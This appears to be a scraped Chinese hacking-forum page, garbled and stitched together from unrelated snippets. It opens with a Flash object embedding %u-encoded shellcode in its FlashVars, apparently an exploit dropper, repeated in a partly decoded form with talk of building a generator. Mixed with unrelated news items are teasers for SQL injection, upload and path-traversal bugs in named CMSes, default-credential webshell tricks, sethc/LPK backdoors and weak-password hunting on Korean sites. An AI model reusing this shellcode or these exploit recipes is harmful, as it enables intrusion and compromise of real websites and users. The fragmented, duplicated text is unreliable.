简单的一个解密,大牛飘过吧,勿拍砖,样本代码. 以下是引用片段： <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="[url=http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=10,0,0,0]http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=10,0,0,0[/url]" width="550" height="400" id="sdfasdf" align="middle"> <param name="allowScriptAccess" value="sameDomain" /> <param name="allowFullScreen" value="false" /> <param name="movie" value="nb.swf" /> <param name="quality" value="high" /> <param name="bgcolor" value="#ffffff" /> <param name="FlashVars" value="sc=%25u9090%25u9090%25u5858%25u5858%25u10EB%25u4B5B%25uC933%25uB966%25u03B8%25u3480%25uBD0B%25uFAE2%25u05EB%25uEBE8%25uFFFF%25u54FF%25uBEA3%25uBDBD%25uD9E2%25u8D1C%25uBDBD%25u36BD%25uB1FD%25uCD36%25u10A1%25uD536%25u36B5%25uD74A%25uE4AC%25u0355%25uBDBF%25u2DBD%25u455F%25u8ED5%25uBD8F%25uD5BD%25uCEE8%25uCFD8%25u36E9%25uB1FB%25u0355%25uBDBC%25u36BD%25uD755%25uE4B8%25u2355%25uBDBF%25u5FBD%25uD544%25uD3D2%25uBDBD%25uC8D5%25uD1CF%25uE9D0%25uAB42%25u7D38%25uAEC8%25uD2D5%25uBDD3%25uD5BD%25uCFC8%25uD0D1%25u36E9%25uB1FB%25u3355%25uBDBC%25u36BD%25uD755%25uE4BC%25uD355%25uBDBF%25u5FBD%25uD544%25u8ED1%25uBD8F%25uCED5%25uD8D5%25uE9D1%25uFB36%25u55B1%25uBCD2%25uBDBD%25u5536%25uBCD7%25u55E4%25uBFF2%25uBDBD%25u445F%25u513C%25uBCBD%25uBDBD%25u6136%25u7E3C%25uBD3D%25uBDBD%25uBDD7%25uA7D7%25uD7EE%25u42BD%25uE1EB%25u7D8E%25u3DFD%25uBE81%25uC8BD%25u7A44%25uBEB9%25uDCE1%25uD893%25uF97A%25uB9BE%25uD8C5%25uBDBD%25u748E%25uECEC%25uEAEE%25u8EEC%25u367D%25uE5FB%25u9F55%25uBDBC%25u3EBD%25uBD45%25u1E54%25uBDBD%25u2DBD%25uBDD7%25uBDD7%25uBED7%25uBDD7%25uBFD7%25uBDD5%25uBDBD%25uEE7D%25uFB36%25u5599%25uBCBC%25uBDBD%25uFB34%25uD7DD%25uEDBD%25uEB42%25u3495%25uD9FB%25uFB36%25uD7DD%25uD7BD%25uD7BD%25uD7BD%25uD7B9%25uEDBD%25uEB42%25uD791%25uD7BD%25uD7BD%25uD5BD%25uBDA2%25uBDB2%25u42ED%25u81EB%25uFB34%25u36C5%25uD9F3%25uC13D%25u42B5%25uC909%25u3DB1%25uB5C1%25uBD42%25uB8C9%25uC93D%25u42B5%25u5F09%25u3456%25u3D3B%25uBDBD%25u7ABD%25uCDFB%25uBDBD%25uBDBD%25uFB7A%25uBDC9%25uBDBD%25uD7BD%25uD7BD%25uD7BD%25u36BD%25uDDFB%25u42ED%25u85EB%25u3B36%25uBD3D%25uBDBD%25uBDD7%25uF330%25uECC9%25uCB42%25uEDCD%25uCB42%25u42DD%25u8DEB%25uCB42%25u42DD%25u89EB%25uCB42%25u42C5%25uFDEB%25u4636%25u7D8E%25u668E%25u513C%25uBFBD%25uBDBD%25u7136%25u453E%25uC0E9%25u34B5%25uBCA1%25u7D3E%25u56B9%25u364E%25u3671%25u3E64%25uAD7E%25u7D8E%25uECED%25uEDEE%25uEDED%25uEDED%25uEAED%25uEDED%25uEB42%25u36B5%25uE9C3%25uAD55%25uBDBC%25u55BD%25uBDD8%25uBDBD%25uDED5%25uCACB%25uD5BD%25uD5CE%25uD2D9%25u36E9%25uB1FB%25u9955%25uBDBD%25u34BD%25u81FB%25u1CD9%25uBDB9%25uBDBD%25u1D30%25u42DD%25u4242%25uD8D7%25uCB42%25u3681%25uADFB%25uB555%25uBDBD%25u8EBD%25uEE66%25uEEEE%25u42EE%25u3D6D%25u5585%25u853D%25uC854%25u3CAC%25uB8C5%25u2D2D%25u2D2D%25uB5C9%25u4236%25u36E8%25u3051%25uB8FD%25u5D42%25u1B55%25uBDBD%25u7EBD%25u1D55%25uBDBD%25u05BD%25uBCAC%25u3DB9%25uB17F%25u55BD%25uBD2E%25uBDBD%25u513C%25uBCBD%25uBDBD%25u4136%25u7A3E%25u7AB9%25u8FBA%25u2CC9%25u7AB1%25uB9FA%25u34DE%25uF26C%25uFA7A%25u1DB5%25u2AD8%25u7A76%25uB1FA%25uFDEC%25uC207%25uFA7A%25u83AD%25u0BA0%25u7A84%25uA9FA%25uD405%25uA669%25uFA7A%25u03A5%25uDBC2%25u7A1D%25uA1FA%25u1441%25u108A%25uFA7A%25u259D%25uADB7%25uD945%25u8D1C%25uBDBD%25u36BD%25uB1FD%25uCD36%25u10A1%25uD536%25u36B5%25uD74A%25uE4B9%25uE955%25uBDBD%25u2DBD%25u455F%25u8ED5%25uBD8F%25uD5BD%25uCEE8%25uCFD8%25u36E9%25u55BB%25u42E8%25u4242%25u5536%25uB8D7%25u55E4%25uBD88%25uBDBD%25u445F%25u428E%25u42EA%25uB9EB%25uBF56%25u7EE5%25u4455%25u4242%25uE642%25uBA7B%25u3405%25uBCE2%25u7ADB%25uB8FA%25u5D42%25uEE7E%25u6136%25uD7EE%25uD5FD%25uADBD%25uBDBD%25u36EA%25u9DFB%25uA555%25u4242%25uE542%25uEC7E%25u36EB%25u81C8%25uC936%25uC593%25u48BE%25u36EB%25u9DCB%25u48BE%25u748E%25uFCF4%25uBE10%25u8E78%25uB266%25uAD03%25u6B87%25uB5C9%25u767C%25uBEBA%25uFD67%25u4C56%25uA286%25u5AC8%25u36E3%25u99E3%25u60BE%25u36DB%25uF6B1%25uE336%25uBEA1%25u3660%25u36B9%25u78BE%25uE316%25u7EE4%25u6055%25u4241%25u0F42%25u5F4F%25u8449%25uC05F%25u673E%25uC6F5%25u8F80%25u2CC9%25u38B1%25u1262%25uDE06%25u6C34%25uECF2%25u07FD%25u1DC2%25u2AD8%25uA376%25uD919%25u2E52%25u598F%25u3329%25uB7AE%25u7F11%25uF6A4%25u79BC%25uA230%25uEAC9%25uB0DB%25uFE42%25u1103%25uC066%25u184D%25uEF27%25u1A43%25u8367%25u0BA0%25u0584%25u69D4%25u03A6%25uDBC2%25u411D%25u8A14%25u2510%25uADB7%25u3D45%25u126B%25u4627%25uA8EE%25ud5db%25uc9c9%25u87cd%25u9292%25uce8f%25udbde%25ude93%25ud0d2%25u8587%25u858d%25uce92%25ucfd8%25ud8cb%25u93cf%25uc5d8%25ubdd8"> uBD0B%25uFAE2%25u05EB%25uEBE8%25uFFFF%25u54FF%25uBEA3%25uBDBD%25uD9E2%25u8D1C%25uBDBD%25u36BD%25uB1FD%25uCD36%25u10A1%25uD536%25u36B5%25uD74A%25uE4AC%25u0355%25uBDBF%25u2DBD%25u455F%25u8ED5%25uBD8F%25uD5BD%25uCEE8%25uCFD8%25u36E9%25uB1FB%25u0355%25uBDBC%25u36BD%25uD755%25uE4B8%25u2355%25uBDBF%25u5FBD%25uD544%25uD3D2%25uBDBD%25uC8D5%25uD1CF%25uE9D0%25uAB42%25u7D38%25uAEC8%25uD2D5%25uBDD3%25uD5BD%25uCFC8%25uD0D1%25u36E9%25uB1FB%25u3355%25uBDBC%25u36BD%25uD755%25uE4BC%25uD355%25uBDBF%25u5FBD%25uD544%25u8ED1%25uBD8F%25uCED5%25uD8D5%25uE9D1%25uFB36%25u55B1%25uBCD2%25uBDBD%25u5536%25uBCD7%25u55E4%25uBFF2%25uBDBD%25u445F%25u513C%25uBCBD%25uBDBD%25u6136%25u7E3C%25uBD3D%25uBDBD%25uBDD7%25uA7D7%25uD7EE%25u42BD%25uE1EB%25u7D8E%25u3DFD%25uBE81%25uC8BD%25u7A44%25uBEB9%25uDCE1%25uD893%25uF97A%25uB9BE%25uD8C5%25uBDBD%25u748E%25uECEC%25uEAEE%25u8EEC%25u367D%25uE5FB%25u9F55%25uBDBC%25u3EBD%25uBD45%25u1E54%25uBDBD%25u2DBD%25uBDD7%25uBDD7%25uBED7%25uBDD7%25uBFD7%25uBDD5%25uBDBD%25uEE7D%25uFB36%25u5599%25uBCBC%25uBDBD%25uFB34%25uD7DD%25uEDBD%25uEB42%25u3495%25uD9FB%25uFB36%25uD7DD%25uD7BD%25uD7BD%25uD7BD%25uD7B9%25uEDBD%25uEB42%25uD791%25uD7BD%25uD7BD%25uD5BD%25uBDA2%25uBDB2%25u42ED%25u81EB%25uFB34%25u36C5%25uD9F3%25uC13D%25u42B5%25uC909%25u3DB1%25uB5C1%25uBD42%25uB8C9%25uC93D%25u42B5%25u5F09%25u3456%25u3D3B%25uBDBD%25u7ABD%25uCDFB%25uBDBD%25uBDBD%25uFB7A%25uBDC9%25uBDBD%25uD7BD%25uD7BD%25uD7BD%25u36BD%25uDDFB%25u42ED%25u85EB%25u3B36%25uBD3D%25uBDBD%25uBDD7%25uF330%25uECC9%25uCB42%25uEDCD%25uCB42%25u42DD%25u8DEB%25uCB42%25u42DD%25u89EB%25uCB42%25u42C5%25uFDEB%25u4636%25u7D8E%25u668E%25u513C%25uBFBD%25uBDBD%25u7136%25u453E%25uC0E9%25u34B5%25uBCA1%25u7D3E%25u56B9%25u364E%25u3671%25u3E64%25uAD7E%25u7D8E%25uECED%25uEDEE%25uEDED%25uEDED%25uEAED%25uEDED%25uEB42%25u36B5%25uE9C3%25uAD55%25uBDBC%25u55BD%25uBDD8%25uBDBD%25uDED5%25uCACB%25uD5BD%25uD5CE%25uD2D9%25u36E9%25uB1FB%25u9955%25uBDBD%25u34BD%25u81FB%25u1CD9%25uBDB9%25uBDBD%25u1D30%25u42DD%25u4242%25uD8D7%25uCB42%25u3681%25uADFB%25uB555%25uBDBD%25u8EBD%25uEE66%25uEEEE%25u42EE%25u3D6D%25u5585%25u853D%25uC854%25u3CAC%25uB8C5%25u2D2D%25u2D2D%25uB5C9%25u4236%25u36E8%25u3051%25uB8FD%25u5D42%25u1B55%25uBDBD%25u7EBD%25u1D55%25uBDBD%25u05BD%25uBCAC%25u3DB9%25uB17F%25u55BD%25uBD2E%25uBDBD%25u513C%25uBCBD%25uBDBD%25u4136%25u7A3E%25u7AB9%25u8FBA%25u2CC9%25u7AB1%25uB9FA%25u34DE%25uF26C%25uFA7A%25u1DB5%25u2AD8%25u7A76%25uB1FA%25uFDEC%25uC207%25uFA7A%25u83AD%25u0BA0%25u7A84%25uA9FA%25uD405%25uA669%25uFA7A%25u03A5%25uDBC2%25u7A1D%25uA1FA%25u1441%25u108A%25uFA7A%25u259D%25uADB7%25uD945%25u8D1C%25uBDBD%25u36BD%25uB1FD%25uCD36%25u10A1%25uD536%25u36B5%25uD74A%25uE4B9%25uE955%25uBDBD%25u2DBD%25u455F%25u8ED5%25uBD8F%25uD5BD%25uCEE8%25uCFD8%25u36E9%25u55BB%25u42E8%25u4242%25u5536%25uB8D7%25u55E4%25uBD88%25uBDBD%25u445F%25u428E%25u42EA%25uB9EB%25uBF56%25u7EE5%25u4455%25u4242%25uE642%25uBA7B%25u3405%25uBCE2%25u7ADB%25uB8FA%25u5D42%25uEE7E%25u6136%25uD7EE%25uD5FD%25uADBD%25uBDBD%25u36EA%25u9DFB%25uA555%25u4242%25uE542%25uEC7E%25u36EB%25u81C8%25uC936%25uC593%25u48BE%25u36EB%25u9DCB%25u48BE%25u748E%25uFCF4%25uBE10%25u8E78%25uB266%25uAD03%25u6B87%25uB5C9%25u767C%25uBEBA%25uFD67%25u4C56%25uA286%25u5AC8%25u36E3%25u99E3%25u60BE%25u36DB%25uF6B1%25uE336%25uBEA1%25u3660%25u36B9%25u78BE%25uE316%25u7EE4%25u6055%25u4241%25u0F42%25u5F4F%25u8449%25uC05F%25u673E%25uC6F5%25u8F80%25u2CC9%25u38B1%25u1262%25uDE06%25u6C34%25uECF2%25u07FD%25u1DC2%25u2AD8%25uA376%25uD919%25u2E52%25u598F%25u3329%25uB7AE%25u7F11%25uF6A4%25u79BC%25uA230%25uEAC9%25uB0DB%25uFE42%25u1103%25uC066%25u184D%25uEF27%25u1A43%25u8367%25u0BA0%25u0584%25u69D4%25u03A6%25uDBC2%25u411D%25u8A14%25u2510%25uADB7%25u3D45%25u126B%25u4627%25uA8EE%25ud5db%25uc9c9%25u87cd%25u9292%25uce8f%25udbde%25ude93%25ud0d2%25u8587%25u858d%25uce92%25ucfd8%25ud8cb%25u93cf%25uc5d8%25ubdd8" quality="high" bgcolor="#ffffff" width="550" height="400" name="sdfasdf" align="middle" allowScriptAccess="sameDomain"

    By：暗月式(darkmoon)     今天渗透一站点，发现旁站有这个系统果断，马上百度一下，然后下载下来。下一步当然是分析，能挖到0day最好

根据公开资料，美国采用了技术管制的形式，对儿童保护和道德、国家安全、知识产权、计算机安全等方面内容实施监控。 对那些不能直接审查的内容间接施加

著名黑客杰夫-莫斯（Jeff Moss） 腾讯科技讯（万学）北京时间5月1日消息，据国外媒体报道，ICANN（互联网名称与数字地址分配机构）已任

今天无意中得到一份文件，具体过程不重要，重要的是文件内容。 原文件是英文的，鄙人英语不好，借着谷歌翻译看懂了一部分，翻译过来后的内容让我彻底震

    By：心灵     EasyTalk 微博系统 X1.X 文件包含漏洞，PluginsAction.class.php 文件中的参数 $_GET['out'] 没有进行任何过滤，直接拿去调用包含文件，

T00ls.Net T 恤订购 开始时间：2011-4-28 16:04 活动地点：北京市海淀区 每人花销：60 元 人员性别：不限 截止日期：2011-5-4 16:59     T00ls.Net 2011 年度T恤(文化

    By：Satan7夕     SDCms 1.2 1.3 后台拿 WebShell 漏洞，SDCMS 时代网站信息管理系统。     默认后台为：/admin，账号密码都是：admin。     后台上传

美国苹果公司 海外媒体透露，苹果现在拥有现金658亿美元。也就是说，苹果如果从现在起中断全部盈利，其现金仍能支撑苹果运营7年。对于投资者来讲，

专门机构监管网络     在美国联邦政府中，联邦通信委员会是对包括互联网在内的通讯产业最具影响力的机构。这一委员会根据美国1934年通过的《通讯法》

新华网新加坡4月28日电（记者 陈济朋）2005年，一个法律判决在新加坡受到关注和热议。 时年17岁的高中生颜怀旭，以“极端种族主义者”自居，在

    By：Rices T00ls Lpk Sethc测试使用视频,看完帖子不明白的看视频马上就明白了。     http://hkrices.com/lpk.html 博客发布更新地址:     http://b.hkrices.com/1608-04-28.html ============================================================ 什么是lpk: 就是一系统dll

    Discuz!NT 2.x - 3.5.2 0day，Discuz!NT ajaxtopicinfo.ascx 用户控件 poster SQL注入漏洞。 漏洞名称：     Discuz!NT ajaxtopicinfo.ascx 用户控件 poster SQL注入漏洞 受影响系统：     Discuz!NT 2.x - 3.5.2 安全综述：    

备受关注的腾讯诉奇虎360 不正当竞争案， 昨天上午在北京市朝阳区法院进行了一审宣判。法院认定北京奇虎科技有限公司、奇智软件以及三际无限等三个被

针对自己网址被域名注册服务商万网公司擅自“封停”一事，电子商务网站慧聪网要动真格了。昨日下午，慧聪网在京宣布，正式对万网公司发起诉讼。近年来

    中国大陆的所有IP段，中国电信所有IP段、中国铁通所有IP段、中国网通所有IP段。 中国大陆的所有IP段： 47.153.128.0 47.154.255.255 58.14.0.0 58.25.255.255 58.30.0.0 58.63.255.255 58.66.0.0 58.68.255.255 58.82.0.0 58.83.255.255 58.87.64.0 58.87.127.255 58.99.128.0 58.101.255.255 58.116.0.0 58.119.255.255 58.128.0.0

网友调侃中石化天价酒单《我为祖国喝茅台》     【视频】网友调侃中石化天价酒单《我为祖国喝茅台》，我为祖国喝茅台，中石化，网友调侃。     不做评论，政

    By：阿神     刚刚在看一个门户的时候扫了好久好久，最后发现一个许愿墙，然后挖源码。     又找了好久，最后找到源码下载后没有什么可利用到的。     最后

    这几天因为一些事，一直再搞韩国棒子的站。给一点弱口令，给大家和国内完全不一样。     暂时把账号表达为：username     账号一般为：域名和 ad

    百度MP3涉嫌违法，被文化部立案查处。百度MP3等违法音乐网站将被立案查处，百度又陷音乐“侵权门” 多家网站涉嫌违法。     本报讯 继今年1月清理

苹果iPhone和谷歌Android手机被曝"定位"用户，谷歌追踪Android操作系统手机用户的行踪。谷歌也有偷窥癖？自称目的是提供服务。

智利瓦尔帕莱索街道自行车下坡赛     智利美丽的“山海之城”瓦尔帕莱索，是智利的门户，智利的第二大城市和南美太平洋沿岸最大的深水港，也是久负盛名的

    无意看到的，下载播放器时弹出的地址，http://10.0.2.100/web/html/download.asp?file=../../

    PHPBoost 3.0 备份漏洞，PHPBoost 3.0 远程下载备份漏洞，PHPBoost 3.0 Remote Download Backup Vulnerability。 ### # Title : PHPBoost 3.0 Remote Download Backup Vulnerability # Author : KedAns-Dz # E-mail : ked-h@hotmail.com

新华网南昌４月２３日电（记者胡锦武）为保护人们在网络上的合法权益不受侵害，江西省高级人民法院日前出台《关于网络侵权纠纷案件适用法律若干问题的

    CGSAIL 网站管理系统注入漏洞，文件 user_view.asp 中的参数 request("id") 没有进行任何过滤操作，直接拿去查数据库了，导致注入漏洞产生。 user_view.asp： <!--#include file="lockip/lockyou.asp"--> <!--#include file =

    凡诺企业网站管理系统上传漏洞，该程序在源码之家月排行第三。 利用：     http://localhost/admin/fckeditor/editor/filemanager/connectors/test.html

    news_view.asp 中的 request("id") 参数没有进行任何过滤，直接拿去查询数据库，导致注入漏洞。 news_view.asp： <% id = request("id") Set rs = Server.CreateObject("ADODB.RecordSet") sql = "select * from news where id="&id rs.Open sql, conn, 1, 3 If rs.EOF And rs.bof Then    

以下是引用片段： <%@ LANGUAGE = VBScript.Encode %> <!--#include file="Inc/SysProduct.asp" --> <% ShowSmallClassType=ShowSmallClassType_Article dim ID ID=trim(request("ID")) if ID="" then     response.Redirect("cg_Product.asp") end if sql="select * from cg_Product where ID=" & ID & "" Set rs= Server.CreateObject("ADODB.Recordset") rs.open sql,conn,1,3 if rs.bof and rs.eof then     response.write"<SCRIPT language=JavaScript&

    弄成生成器吧，解密了一半。 以下是引用片段： <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=10,0,0,0" width="550" height="400" id="sdfasdf" align="middle"> <param name="allowScriptAccess" value="sameDomain" /> <param name="allowFullScreen" value="false" /> <param name="movie" value="nb.swf" /> <param name="quality" value="high" /> <param name="bgcolor" value="#ffffff" /> <param name="FlashVars" value="sc=XXXX[K3f4T6666JU-_E6U6UU#_DB8}6U36UU_D6U6UU_D<Q6a<~=B}=Dzzt}6U>ET-}6U4B46BB46=B=B=B_V4;=zz6B6;=0BBBBBBB6F}f<Q6q>E4>}VN6q6d>~}B6UU6U40BBBB6UfBm=U=T<----6B6Q0B]U~U=U.<Q6A>zz,z4lz*vzzzizzAz 666JU-_E6UBBB6UU_DBBV~UDBBB{4zB]~6a6UBBB~66H6Htxfk|vgVLZ6`66`66x~U`ABBO_I_>g,8b4l*vR.Y)3y0BfM'CgiA%E=k'F"> <embed src="nb.swf" FlashVars="sc=XXXX[K3f4T6666JU-_E6U6UU#_DB8}6U36UU_D6U6UU_D<Q6a<~=B}=Dzzt}6U>ET-}6U4B46BB46=B=B=B_V4;=zz6B6;=0BBBBBBB6F}f<Q6q>E4>}VN6q6d>~}B6UU6U40BBBB6UfBm=U=T<----6B6Q0B]U~U=U.<Q6A>zz,z4lz*vzzzizzAz 666JU-_E6UBBB6UU_DBBV~UDBBB{4zB]~6a6UBBB~66H6Htxfk|vgVLZ6`66`66x~U`ABBO_I_>g,8b4l*vR.Y)3y0BfM'CgiA%E=k'F" quality="high" bgcolor="#ffffff" width="550" height="400" name="sdfasdf" align="middle" allowScriptAccess="sameDomain" allowFullScreen="false" type="application/x-shockwave-flash" pluginspage="http://www.adobe.com/go/getflashplayer_cn" /> </object>